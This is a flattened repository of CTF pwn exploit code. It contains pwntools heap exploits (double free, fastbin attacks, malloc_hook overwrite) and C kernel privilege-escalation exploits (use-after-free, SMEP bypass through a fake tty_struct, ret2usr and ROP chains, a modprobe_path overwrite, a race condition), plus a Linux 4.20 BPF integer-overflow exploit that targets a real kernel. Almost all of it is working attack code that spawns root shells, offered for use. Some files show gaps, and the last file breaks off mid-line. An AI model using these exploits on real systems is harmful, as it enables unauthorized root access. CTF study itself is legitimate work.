├── 2015 9447 CTF Search Engine ├── exp.py └── search ├── 2016 xdctf pwn200 ├── exp.py └── pwn200 ├── 2017 0ctf babyheap ├── bheap └── exp.py ├── 2017CISCN babydriver ├── babydriver.ko ├── babydriver.tar ├── bypass_smep.c └── poc.c ├── 2018 0CTF Finals Baby Kernel ├── baby.ko ├── busybox-1.31.0.tar.bz2 ├── core.cpio ├── poc.c ├── start.sh └── vmlinuz-4.15.0-22-generic ├── 2018 强网杯kernel pwn-core ├── bzImage ├── core.cpio.zip ├── core.ko ├── ret2usr.c ├── rop.c └── start.sh ├── 2019 STARCTF hackme ├── bzImage ├── hackme.ko ├── initramfs.cpio ├── poc.c └── start.sh ├── Linux kernel 4.20 BPF 整数溢出 ├── bpf.cpio ├── bzImage ├── exp.c ├── start.sh └── vmlinux.zip └── README.md /2015 9447 CTF Search Engine/exp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from pwn import * 3 | context.log_level = 'debug' 4 | context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] 5 | name = './search' 6 | p = process(name) 7 | 8 | if args.G: 9 | gdb.attach(p) 10 | 11 | def search(s): 12 | p.recvuntil("3: Quit\n") 13 | p.sendline("1") 14 | p.recvuntil("Enter the word size:\n") 15 | p.sendline(str(len(s))) 16 | p.recvuntil("Enter the word:\n") 17 | p.sendline(s) 18 | 19 | def delete(s): 20 | p.recvuntil("Delete this sentence (y/n)?\n") 21 | p.sendline(s) 22 | 23 | def index(s): 24 | p.recvuntil("3: Quit\n") 25 | p.sendline("2") 26 | p.recvuntil("Enter the sentence size:\n") 27 | p.sendline(str(len(s))) 28 | p.recvuntil("Enter the sentence:\n") 29 | p.sendline(s) 30 | 31 | def offset_bin_main_arena(idx): 32 | word_bytes = context.word_size / 8 33 | offset = 4 # lock 34 | offset += 4 # flags 35 | offset += word_bytes * 10 # offset fastbin 36 | offset += word_bytes * 2 # top,last_remainder 37 | offset += idx * 2 * word_bytes # idx 38 | offset -= word_bytes * 2 # bin overlap 39 | return offset 40 | 41 | unsortedbin_offset_main_arena = offset_bin_main_arena(0) 42 | 43 | index("a"*0x85 + " s") 44 | search("s") 45 | delete('y') 46 | search("\x00") 47 | p.recvuntil("Found 135: ") 48 | lib_addr = u64(p.recv(6) + '\x00\x00') 49 | success("lib_addr: " + hex(lib_addr)) 50 | one_gadget_addr = lib_addr - 0x399b58 + 0x3f306 51 | main_arena_addr = lib_addr - 0x58 52 | delete('n') 53 | 54 | index('a'*0x5d + ' d') 55 | index('b'*0x5d + ' d') 56 | index('c'*0x5d + ' d') 57 | 58 | search("d") 59 | delete("y") 60 | delete("y") 61 | delete("y") 62 | 63 | search("\x00") 64 | delete("y") 65 | delete("n") 66 | delete("n") # fastbin 的情况为 b->a->b->a->... 67 | # double_free已经构成 68 | fake_chunk_addr = main_arena_addr - 0x33 69 | fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f') 70 | 71 | index(fake_chunk) 72 | index('a' * 0x60) #分配chunk_a 73 | index('b' * 0x60) #分配chunk_b 74 | payload = '|/bin/sh;' 75 | payload += (0x13-len(payload))*'a' + p64(one_gadget_addr) 76 | payload = payload.ljust(0x60, 'f') 77 | index(payload) #malloc_hook为one_gadget 78 | p.interactive() 79 | -------------------------------------------------------------------------------- /2015 9447 CTF Search Engine/search: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2015 9447 CTF Search Engine/search -------------------------------------------------------------------------------- /2016 xdctf pwn200/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context.log_level = 'debug' 3 | context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] 4 | name = './pwn200' 5 | p = process(name) 6 | 7 | if args.G: 8 | gdb.attach(p) 9 | 10 | p.recvuntil("who are u?\n") 11 | shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" 12 | shellcode += (44-len(shellcode))*'a' + 'b'*4 13 | p.send(shellcode) 14 | p.recvuntil("bbbb") 15 | ebp_addr = u64(p.recv(6)+'\x00\x00') 16 | success("ebp_addr: " + hex(ebp_addr)) 17 | 18 | p.recvuntil("give me your id ~~?\n") 19 | p.sendline("64") 20 | p.recvuntil("give me money~\n") 21 | payload = p64(ebp_addr-0x50) 22 | payload += (56-len(payload))*'a' + p64(0x602060) 23 | p.send(payload) 24 | 25 | p.recvuntil('your choice : ') 26 | p.sendline("1") 27 | p.interactive() 28 | -------------------------------------------------------------------------------- /2016 xdctf pwn200/pwn200: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2016 xdctf pwn200/pwn200 -------------------------------------------------------------------------------- /2017 0ctf babyheap/bheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2017 0ctf babyheap/bheap -------------------------------------------------------------------------------- /2017 0ctf babyheap/exp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from pwn import * 3 | context.log_level = 'debug' 4 | context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] 5 | name = './bheap' 6 | elf = ELF(name) 7 | p = process(name) 8 | #p = remote("111.198.29.45",30617) 9 | if args.G: 10 | gdb.attach(p) 11 | 12 | def alloc(s): 13 | p.recvuntil("Command: ") 14 | p.sendline("1") 15 | p.recvuntil("Size: ") 16 | p.sendline(str(s)) 17 | 18 | def fill(i,s,data): 19 | p.recvuntil("Command: ") 20 | p.sendline("2") 21 | p.recvuntil("Index: ") 22 | p.sendline(str(i)) 23 | p.recvuntil("Size: ") 24 | p.sendline(str(s)) 25 | p.recvuntil("Content: ") 26 | p.sendline(data) 27 | 28 | def free(i): 29 | p.recvuntil("Command: ") 30 | p.sendline("3") 31 | p.recvuntil("Index: ") 32 | p.sendline(str(i)) 33 | 34 | def dump(i): 35 | p.recvuntil("Command: ") 36 | p.sendline("4") 37 | p.recvuntil("Index: ") 38 | p.sendline(str(i)) 39 | 40 | alloc(10) # 0 41 | alloc(10) # 1 42 | alloc(10) # 2 43 | alloc(10) # 3 44 | alloc(10) # 4 45 | alloc(0x80) # 5 46 | 47 | free(1) 48 | free(3) 49 | payload = 'a'*24 + p64(0x21) + p8(0xa0) 50 | fill(2,len(payload),payload) 51 | 52 | payload = 'a'*24 + p64(0x21) 53 | fill(4,len(payload),payload) 54 | alloc(10) # 1 55 | alloc(10) # 3 5 56 | 57 | payload = 'a'*24 + p64(0x91) 58 | 59 | fill(4,len(payload),payload) 60 | alloc(0x80) # 6 61 | free(5) 62 | dump(3) 63 | 64 | p.recvuntil("Content: \n") 65 | main_arena = u64(p.recv(6) + '\x00\x00') - 0x58 66 | success("main_arena: " + hex(main_arena)) 67 | 68 | alloc(0x60) # 5 69 | free(5) 70 | payload = p64(main_arena-0x33) 71 | fill(3,len(payload),payload) 72 | alloc(0x60) # 5 73 | alloc(0x60) # 6 74 | 75 | one_gadget = main_arena - 0x399b00 + 0x3f35a 76 | payload = '|/bin/sh;' + 'a'*10 + p64(one_gadget) 77 | fill(7,len(payload),payload) 78 | alloc(0x20) 79 | p.interactive() 80 | -------------------------------------------------------------------------------- /2017CISCN babydriver/babydriver.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2017CISCN babydriver/babydriver.ko -------------------------------------------------------------------------------- /2017CISCN babydriver/babydriver.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2017CISCN babydriver/babydriver.tar -------------------------------------------------------------------------------- /2017CISCN babydriver/bypass_smep.c: -------------------------------------------------------------------------------- 1 | //poc.c 2 | //gcc poc.c -o poc -w -static 3 | #include 4 | #include 5 | #include 6 | unsigned long user_cs, user_ss, user_eflags,user_sp; 7 | size_t commit_creds_addr = 0xffffffff810a1420; 8 | size_t prepare_kernel_cred_addr = 0xffffffff810a1810; 9 | void* fake_tty_opera[30]; 10 | 11 | void shell(){ 12 | system("/bin/sh"); 13 | } 14 | 15 | void save_stats(){ 16 | asm( 17 | "movq %%cs, %0\n" 18 | "movq %%ss, %1\n" 19 | "movq %%rsp, %3\n" 20 | "pushfq\n" 21 | "popq %2\n" 22 | :"=r"(user_cs), "=r"(user_ss), "=r"(user_eflags),"=r"(user_sp) 23 | : 24 | : "memory" 25 | ); 26 | } 27 | 28 | void get_root(){ 29 | char* (*pkc)(int) = prepare_kernel_cred_addr; 30 | void (*cc)(char*) = commit_creds_addr; 31 | (*cc)((*pkc)(0)); 32 | } 33 | 34 | int main(){ 35 | int fd1,fd2,fd3,i=0; 36 | size_t fake_tty_struct[4] = {0}; 37 | size_t rop[20]={0}; 38 | save_stats(); 39 | 40 | rop[i++] = 0xffffffff810d238d; //pop_rdi_ret 41 | rop[i++] = 0x6f0; 42 | rop[i++] = 0xffffffff81004d80; //mov_cr4_rdi_pop_rbp_ret 43 | rop[i++] = 0x6161616161; 44 | rop[i++] = (size_t)get_root; 45 | rop[i++] = 0xffffffff81063694; //swapgs_pop_rbp_ret 46 | rop[i++] = 0x6161616161; 47 | rop[i++] = 0xffffffff814e35ef; // iretq; ret; 48 | rop[i++] = (size_t)shell; 49 | rop[i++] = user_cs; 50 | rop[i++] = user_eflags; 51 | rop[i++] = user_sp; 52 | rop[i++] = user_ss; 53 | 54 | for(i = 0; i < 30; i++) 55 | { 56 | fake_tty_opera[i] = 0xffffffff8181bfc5; 57 | } 58 | fake_tty_opera[0] = 0xffffffff810635f5; //pop rax; pop rbp; ret; 59 | fake_tty_opera[1] = (size_t)rop; 60 | fake_tty_opera[3] = 0xffffffff8181bfC5; // mov rsp,rax ; dec ebx ; ret 61 | fake_tty_opera[7] = 0xffffffff8181bfc5; 62 | 63 | fd1 = open("/dev/babydev",O_RDWR); 64 | fd2 = open("/dev/babydev",O_RDWR); 65 | ioctl(fd1,0x10001,0x2e0); 66 | close(fd1); 67 | fd3 = open("/dev/ptmx",O_RDWR|O_NOCTTY); 68 | read(fd2, fake_tty_struct, 32); 69 | fake_tty_struct[3] = (size_t)fake_tty_opera; 70 | write(fd2,fake_tty_struct, 32); 71 | write(fd3,"cc-sir",6); //触发rop 72 | return 0; 73 | } 74 | -------------------------------------------------------------------------------- /2017CISCN babydriver/poc.c: -------------------------------------------------------------------------------- 1 | //kernel 4.4.72 2 | //poc.c 3 | //gcc poc.c -o poc -static -w 4 | #include 5 | #include 6 | #include 7 | int main(){ 8 | int fd1,fd2,id; 9 | char cred[0xa8] = {0}; 10 | fd1 = open("dev/babydev",O_RDWR); 11 | fd2 = open("dev/babydev",O_RDWR); 12 | ioctl(fd1,0x10001,0xa8); 13 | close(fd1); 14 | id = fork(); 15 | if(id == 0){ 16 | write(fd2,cred,28); 17 | if(getuid() == 0){ 18 | printf("[*]welcome root:\n"); 19 | system("/bin/sh"); 20 | return 0; 21 | } 22 | } 23 | else if(id < 0){ 24 | printf("[*]fork fail\n"); 25 | } 26 | else{ 27 | wait(NULL); 28 | } 29 | close(fd2); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /2018 0CTF Finals Baby Kernel/baby.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2018 0CTF Finals Baby Kernel/baby.ko -------------------------------------------------------------------------------- /2018 0CTF Finals Baby Kernel/busybox-1.31.0.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2018 0CTF Finals Baby Kernel/busybox-1.31.0.tar.bz2 -------------------------------------------------------------------------------- /2018 0CTF Finals Baby Kernel/core.cpio: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2018 0CTF Finals Baby Kernel/core.cpio -------------------------------------------------------------------------------- /2018 0CTF Finals Baby Kernel/poc.c: -------------------------------------------------------------------------------- 1 | //poc.c 2 | //gcc poc.c -o poc -w -static -pthread 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | unsigned long long flag_addr; 9 | int Time = 1000; 10 | int finish = 1; 11 | 12 | struct v5{ 13 | char *flag; 14 | size_t len; 15 | }; 16 | 17 | //change the user_flag_addr to the kernel_flag_addr 18 | void change_flag_addr(void *a){ 19 | struct v5 *s = a; 20 | while(finish == 1){ 21 | s->flag = flag_addr; 22 | } 23 | } 24 | 25 | int main() 26 | { 27 | setvbuf(stdin,0,2,0); 28 | setvbuf(stdout,0,2,0); 29 | setvbuf(stderr,0,2,0); 30 | pthread_t t1; 31 | char buf[201]={0}; 32 | char m[] = "flag{AAAA_BBBB_CC_DDDD_EEEE_FFFF}"; //user_flag 33 | char *addr; 34 | int file_addr,fd,ret,id,i; 35 | struct v5 t; 36 | t.flag = m; 37 | t.len = 33; 38 | fd = open("/dev/baby",0); 39 | ret = ioctl(fd,0x6666); 40 | system("dmesg | grep flag > /tmp/sir.txt"); //get kernel_flag_addr 41 | file_addr = open("/tmp/sir.txt",O_RDONLY); 42 | id = read(file_addr,buf,200); 43 | close(file_addr); 44 | addr = strstr(buf,"Your flag is at "); 45 | if(addr) 46 | { 47 | addr +=16; 48 | flag_addr = strtoull(addr,addr+16,16); 49 | printf("[*]The flag_addr is at: %p\n",flag_addr); 50 | } 51 | else 52 | { 53 | printf("[*]Didn't find the flag_addr!\n"); 54 | return 0; 55 | } 56 | pthread_create(&t1,NULL,change_flag_addr,&t); //Malicious thread 57 | for(i=0;i 5 | #include 6 | #include 7 | int fd; 8 | unsigned long user_cs, user_ss, user_eflags,user_sp; 9 | size_t commit_creds_addr,prepare_kernel_cred_addr; 10 | 11 | void core_read(char *buf){ 12 | ioctl(fd,0x6677889B,buf); 13 | //printf("[*]The buf is:%x\n",buf); 14 | } 15 | 16 | void change_off(long long v1){ 17 | ioctl(fd,0x6677889c,v1); 18 | } 19 | 20 | void core_write(char *buf,int a3){ 21 | write(fd,buf,a3); 22 | } 23 | 24 | void core_copy_func(long long size){ 25 | ioctl(fd,0x6677889a,size); 26 | } 27 | 28 | void shell(){ 29 | system("/bin/sh"); 30 | } 31 | 32 | void save_stats(){ 33 | asm( 34 | "movq %%cs, %0\n" 35 | "movq %%ss, %1\n" 36 | "movq %%rsp, %3\n" 37 | "pushfq\n" 38 | "popq %2\n" 39 | :"=r"(user_cs), "=r"(user_ss), "=r"(user_eflags),"=r"(user_sp) 40 | : 41 | : "memory" 42 | ); 43 | } 44 | 45 | void get_root(){ 46 | char* (*pkc)(int) = prepare_kernel_cred_addr; 47 | void (*cc)(char*) = commit_creds_addr; 48 | (*cc)((*pkc)(0)); 49 | } 50 | 51 | int main(){ 52 | int ret,i; 53 | char buf[0x100]; 54 | size_t vmlinux_base,core_base,canary; 55 | size_t commit_creds_offset = 0x9c8e0; 56 | size_t prepare_kernel_cred_offset = 0x9cce0; 57 | size_t rop[0x100]; 58 | save_stats(); 59 | fd = open("/proc/core",O_RDWR); 60 | change_off(0x40); 61 | core_read(buf); 62 | /* 63 | for(i=0;i<0x40;i++){ 64 | printf("[*] The buf[%x] is:%p\n",i,*(size_t *)(&buf[i])); 65 | } 66 | */ 67 | vmlinux_base = *(size_t *)(&buf[0x20]) - 0x1dd6d1; 68 | core_base = *(size_t *)(&buf[0x10]) - 0x19b; 69 | prepare_kernel_cred_addr = vmlinux_base + prepare_kernel_cred_offset; 70 | commit_creds_addr = vmlinux_base + commit_creds_offset; 71 | canary = *(size_t *)(&buf[0]); 72 | printf("[*]canary:%p\n",canary); 73 | printf("[*]vmlinux_base:%p\n",vmlinux_base); 74 | printf("[*]core_base:%p\n",core_base); 75 | printf("[*]prepare_kernel_cred_addr:%p\n",prepare_kernel_cred_addr); 76 | printf("[*]commit_creds_addr:%p\n",commit_creds_addr); 77 | //junk 78 | for(i = 0;i < 8;i++){ 79 | rop[i] = 0x66666666; 80 | } 81 | rop[i++] = canary; //canary 82 | rop[i++] = 0x0; 83 | rop[i++] = (size_t)get_root; 84 | rop[i++] = core_base + 0xd6; //swapgs_ret 85 | rop[i++] = 0; //rbp(junk) 86 | rop[i++] = vmlinux_base + 0x50ac2; //iretp_ret 87 | rop[i++] = (size_t)shell; 88 | rop[i++] = user_cs; 89 | rop[i++] = user_eflags; 90 | rop[i++] = user_sp; 91 | rop[i++] = user_ss; 92 | 93 | core_write(rop,0x100); 94 | core_copy_func(0xf000000000000100); 95 | return 0; 96 | } 97 | -------------------------------------------------------------------------------- /2018 强网杯kernel pwn-core/rop.c: -------------------------------------------------------------------------------- 1 | //rop.c 2 | //gcc rop.c -o poc -w -static 3 | #include 4 | #include 5 | #include 6 | int fd; 7 | void core_read(char *buf){ 8 | ioctl(fd,0x6677889B,buf); 9 | //printf("[*]The buf is:%x\n",buf); 10 | } 11 | 12 | void change_off(long long v1){ 13 | ioctl(fd,0x6677889c,v1); 14 | } 15 | 16 | void core_write(char *buf,int a3){ 17 | write(fd,buf,a3); 18 | } 19 | 20 | void core_copy_func(long long size){ 21 | ioctl(fd,0x6677889a,size); 22 | } 23 | 24 | void shell(){ 25 | system("/bin/sh"); 26 | } 27 | 28 | unsigned long user_cs, user_ss, user_eflags,user_sp ; 29 | void save_stats(){ 30 | asm( 31 | "movq %%cs, %0\n" 32 | "movq %%ss, %1\n" 33 | "movq %%rsp, %3\n" 34 | "pushfq\n" 35 | "popq %2\n" 36 | :"=r"(user_cs), "=r"(user_ss), "=r"(user_eflags),"=r"(user_sp) 37 | : 38 | : "memory" 39 | ); 40 | } 41 | 42 | int main(){ 43 | int ret,i; 44 | char buf[0x100]; 45 | size_t vmlinux_base,core_base,canary; 46 | size_t commit_creds_addr,prepare_kernel_cred_addr; 47 | size_t commit_creds_offset = 0x9c8e0; 48 | size_t prepare_kernel_cred_offset = 0x9cce0; 49 | size_t rop[0x100]; 50 | save_stats(); 51 | fd = open("/proc/core",O_RDWR); 52 | change_off(0x40); 53 | core_read(buf); 54 | /* 55 | for(i=0;i<0x40;i++){ 56 | printf("[*] The buf[%x] is:%p\n",i,*(size_t *)(&buf[i])); 57 | } 58 | */ 59 | vmlinux_base = *(size_t *)(&buf[0x20]) - 0x1dd6d1; 60 | core_base = *(size_t *)(&buf[0x10]) - 0x19b; 61 | prepare_kernel_cred_addr = vmlinux_base + prepare_kernel_cred_offset; 62 | commit_creds_addr = vmlinux_base + commit_creds_offset; 63 | canary = *(size_t *)(&buf[0]); 64 | printf("[*]canary:%p\n",canary); 65 | printf("[*]vmlinux_base:%p\n",vmlinux_base); 66 | printf("[*]core_base:%p\n",core_base); 67 | printf("[*]prepare_kernel_cred_addr:%p\n",prepare_kernel_cred_addr); 68 | printf("[*]commit_creds_addr:%p\n",commit_creds_addr); 69 | //junk 70 | for(i = 0;i < 8;i++){ 71 | rop[i] = 0x66666666; 72 | } 73 | rop[i++] = canary; //canary 74 | rop[i++] = 0; //rbp(junk) 75 | rop[i++] = vmlinux_base + 0xb2f; //pop_rdi_ret; 76 | rop[i++] = 0; //rdi 77 | rop[i++] = prepare_kernel_cred_addr; 78 | rop[i++] = vmlinux_base + 0xa0f49; //pop_rdx_ret 79 | rop[i++] = vmlinux_base + 0x21e53; //pop_rcx_ret 80 | rop[i++] = vmlinux_base + 0x1aa6a; //mov_rdi_rax_call_rdx 81 | rop[i++] = commit_creds_addr; 82 | rop[i++] = core_base + 0xd6; //swapgs_ret 83 | rop[i++] = 0; //rbp(junk) 84 | rop[i++] = vmlinux_base + 0x50ac2; //iretp_ret 85 | rop[i++] = (size_t)shell; 86 | rop[i++] = user_cs; 87 | rop[i++] = user_eflags; 88 | rop[i++] = user_sp; 89 | rop[i++] = user_ss; 90 | core_write(rop,0x100); 91 | core_copy_func(0xf000000000000100); 92 | return 0; 93 | } 94 | -------------------------------------------------------------------------------- /2018 强网杯kernel pwn-core/start.sh: -------------------------------------------------------------------------------- 1 | qemu-system-x86_64 \ 2 | -m 256M \ 3 | -kernel ./bzImage \ 4 | -initrd ./core.cpio \ 5 | -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr useradd \ 6 | -gdb tcp::1234 \ 7 | -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \ 8 | -nographic \ 9 | -------------------------------------------------------------------------------- /2019 STARCTF hackme/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2019 STARCTF hackme/bzImage -------------------------------------------------------------------------------- /2019 STARCTF hackme/hackme.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2019 STARCTF hackme/hackme.ko -------------------------------------------------------------------------------- /2019 STARCTF hackme/initramfs.cpio: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/2019 STARCTF hackme/initramfs.cpio -------------------------------------------------------------------------------- /2019 STARCTF hackme/poc.c: -------------------------------------------------------------------------------- 1 | //poc.c 2 | //gcc poc.c -o poc -w -static 3 | #include 4 | #include 5 | #include 6 | 7 | struct heap{ 8 | size_t id; 9 | size_t *data; 10 | size_t len; 11 | size_t offset; 12 | }; 13 | int fd; 14 | 15 | void alloc(int id, char *data, size_t len){ 16 | struct heap h; 17 | h.id = id; 18 | h.data = data; 19 | h.len = len; 20 | ioctl(fd,0x30000,&h); 21 | } 22 | 23 | void delete(int id){ 24 | struct heap h; 25 | h.id = id; 26 | ioctl(fd,0x30001,&h); 27 | } 28 | 29 | void cin_kernel(int id, char *data, size_t len, size_t offset){ 30 | struct heap h; 31 | h.id = id; 32 | h.data = data; 33 | h.len = len; 34 | h.offset = offset; 35 | ioctl(fd,0x30002,&h); 36 | } 37 | 38 | void cout_kernel(int id, char *data, size_t len, size_t offset){ 39 | struct heap h; 40 | h.id = id; 41 | h.data = data; 42 | h.len = len; 43 | h.offset = offset; 44 | ioctl(fd,0x30003,&h); 45 | } 46 | 47 | int main(){ 48 | fd = open("/dev/hackme",0); 49 | size_t heap_addr,kernel_addr,mod_tree_addr,ko_addr,pool_addr; 50 | char *mem = malloc(0x1000); 51 | if(fd < 0){ 52 | printf("[*]OPEN KO ERROR!\n"); 53 | exit(0); 54 | } 55 | memset(mem,'A',0x100); 56 | alloc(0,mem,0x100); 57 | alloc(1,mem,0x100); 58 | alloc(2,mem,0x100); 59 | alloc(3,mem,0x100); 60 | alloc(4,mem,0x100); 61 | 62 | delete(1); 63 | delete(3); 64 | cout_kernel(4,mem,0x100,-0x100); 65 | heap_addr = *((size_t *)mem) - 0x100; 66 | printf("[*]heap_addr: 0x%16llx\n",heap_addr); 67 | cout_kernel(0,mem,0x200,-0x200); 68 | kernel_addr = *((size_t *)mem) - 0x0472c0; 69 | mod_tree_addr = kernel_addr + 0x011000; 70 | printf("[*]kernel_addr: 0x%16llx\n",kernel_addr); 71 | printf("[*]mod_tree_add: 0x%16llx\n",mod_tree_addr); 72 | 73 | memset(mem,'B',0x100); 74 | *((size_t *)mem) = mod_tree_addr + 0x50; 75 | cin_kernel(4,mem,0x100,-0x100); 76 | memset(mem,'C',0x100); 77 | alloc(5,mem,0x100); 78 | alloc(6,mem,0x100); 79 | cout_kernel(6,mem,0x40,-0x40); 80 | ko_addr = *((size_t *)mem) - 0x2338; 81 | pool_addr = ko_addr + 0x2400; 82 | printf("[*]ko_addr: 0x%16llx\n",ko_addr); 83 | printf("[*]pool_addr: 0x%16llx\n",pool_addr); 84 | 85 | delete(2); 86 | delete(5); 87 | memset(mem,'D',0x100); 88 | *((size_t *)mem) = pool_addr + 0xc0; 89 | cin_kernel(4,mem,0x100,-0x100); 90 | alloc(7,mem,0x100); 91 | alloc(8,mem,0x100); 92 | 93 | *((size_t *)mem) = kernel_addr + 0x03f960; 94 | *((size_t *)(mem+0x8)) = 0x100; 95 | cin_kernel(8,mem,0x10,0); 96 | 97 | strncpy(mem,"/home/pwn/copy.sh\0",18); 98 | cin_kernel(0xc,mem,18,0); 99 | system("echo -ne '#!/bin/sh\n/bin/cp /flag /home/pwn/flag\n/bin/chmod 777 /home/pwn/flag' > /home/pwn/copy.sh"); 100 | system("chmod +x /home/pwn/copy.sh"); 101 | system("echo -ne '\\xff\\xff\\xff\\xff' > /home/pwn/sir"); 102 | system("chmod +x /home/pwn/sir"); 103 | 104 | system("/home/pwn/sir"); 105 | system("cat /home/pwn/flag"); 106 | return 0; 107 | } 108 | -------------------------------------------------------------------------------- /2019 STARCTF hackme/start.sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | cd `dirname $0` 3 | stty intr ^] 4 | qemu-system-x86_64 \ 5 | -m 256M \ 6 | -nographic \ 7 | -kernel bzImage \ 8 | -append 'console=ttyS0 loglevel=3 oops=panic panic=1 kaslr' \ 9 | -monitor /dev/null \ 10 | -initrd initramfs.cpio \ 11 | -smp cores=4,threads=2 \ 12 | -gdb tcp::1234 \ 13 | -cpu qemu64,smep,smap 2>/dev/null 14 | -------------------------------------------------------------------------------- /Linux kernel 4.20 BPF 整数溢出/bpf.cpio: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/Linux kernel 4.20 BPF 整数溢出/bpf.cpio -------------------------------------------------------------------------------- /Linux kernel 4.20 BPF 整数溢出/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cc-sir/ctf-challenge/60f49d74c0992542cd2dc00eed55cbdfad132c68/Linux kernel 4.20 BPF 整数溢出/bzImage -------------------------------------------------------------------------------- /Linux kernel 4.20 BPF 整数溢出/exp.c: -------------------------------------------------------------------------------- 1 | // gcc -o exp exp.c -static -fno-pie 2 | // exploit author: Wei Wu (ww9210@gmail.com) 3 | // initial poc generated by syzkaller 4 | 5 | #define _GNU_SOURCE 6 | #define SPRAY_NUMBER 14 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #define native_write_cr4 0xffffffff810037d5// 0xffffffff81097fcc 28 | #define POPRDX 0xffffffff81002dda 29 | #define DUMMY 0 30 | #define PREPARE_KERNEL_CRED 0xFFFFFFFF810E3D40 //0xffffffff810e3670 31 | #define COMMIT_CREDS 0xFFFFFFFF810E3AB0 //0xffffffff810e33e0 32 | #define poprdiret 0xffffffff810013b9 33 | #define popraxret 0xffffffff81029c71 34 | #define swapgs 0xffffffff81c00d5a//0xffffffff81c0095f 35 | #define iretq 0xffffffff8106d8f4 36 | #define stack_pivot_gadget 0xffffffff81954dc8 37 | #define stack_top_offset 0x674 38 | #define krop_base_to_map 0x81954000 39 | int rop_start=0x1444-8; 40 | void* krop_base_mapped; 41 | 42 | unsigned long user_cs, user_ss, user_rflags; 43 | 44 | static void save_state() 45 | { 46 | asm( 47 | "movq %%cs, %0\n" 48 | "movq %%ss, %1\n" 49 | "pushfq\n" 50 | "popq %2\n" 51 | : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags) 52 | : 53 | : "memory"); 54 | } 55 | 56 | void get_shell() 57 | { 58 | system("id"); 59 | char *shell = "/bin/sh"; 60 | char *args[] = {shell, NULL}; 61 | execve(shell, args, NULL); 62 | } 63 | 64 | typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 65 | typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 66 | 67 | _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; 68 | _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; 69 | 70 | void get_root_payload(void) 71 | { 72 | commit_creds(prepare_kernel_cred(0)); 73 | } 74 | unsigned long rop_chain[] = { 75 | popraxret, 76 | 0x6f0, 77 | 0xffffffff81001c51,//native_write_cr4, 78 | poprdiret, 79 | 0, 80 | PREPARE_KERNEL_CRED, 81 | 0xffffffff81001c50, //: pop rsi ; ret 82 | poprdiret, 83 | 0xffffffff81264e0b,//: push rax; push rsi; ret; //0xffffffff812646fb, //: push rax ; push rsi ; ret 84 | COMMIT_CREDS, 85 | swapgs, 86 | 0x246, 87 | iretq, 88 | (unsigned long)&get_shell, 89 | 0,//user_cs, 90 | 0,//user_rflags, 91 | 0,//krop_base_mapped + 0x4000, 92 | 0//user_ss 93 | }; 94 | 95 | void * fakestack; 96 | void prepare_krop(){ 97 | krop_base_mapped=mmap((void *)krop_base_to_map,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0); 98 | if (krop_base_mapped<0){ 99 | perror("mmap failed"); 100 | } 101 | fakestack=mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0); 102 | *(unsigned long*)0x0000000081954dc8=popraxret; 103 | *(unsigned long*)krop_base_to_map = 0; 104 | *(unsigned long*)(krop_base_to_map+0x1000) = 0; 105 | *(unsigned long*)(krop_base_to_map+0x2000) = 0; 106 | *(unsigned long*)(krop_base_to_map+0x3000) = 0; 107 | *(unsigned long*)(krop_base_to_map+0x4000) = 0; 108 | *(unsigned long*)(krop_base_to_map+0x5000) = 0; 109 | *(unsigned 